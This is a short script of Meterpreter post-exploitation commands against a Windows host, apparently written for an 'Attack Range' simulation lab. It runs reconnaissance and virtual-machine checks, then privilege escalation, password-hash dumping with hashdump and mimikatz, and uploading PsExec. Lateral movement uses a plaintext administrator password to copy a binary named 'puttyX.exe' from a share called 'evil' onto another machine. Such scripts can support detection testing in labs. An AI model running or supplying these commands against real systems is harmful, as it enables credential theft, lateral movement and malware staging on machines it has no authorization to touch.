sysinfo
getuid
getenv
localtime
ipconfig
arp
netstat
run post/windows/gather/checkvm
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
getsytem
hashdump
load mimikatz
msv
upload /var/www/PsExec64.exe C:/Users/Administrator/Downloads
load powershell
powershell_execute "C:/Users/Administrator/Downloads/PsExec64.exe \\\\10.0.1.4 -u Administrator -p I-l1ke-Attack-Range! -accepteula cmd /c copy \\\\10.0.1.5\\evil\\puttyX.exe C:\\puttyX.exe "
download C:/Users/Administrator/Downloads/PsExec64.exe /tmp/PsExec64.exe
quit
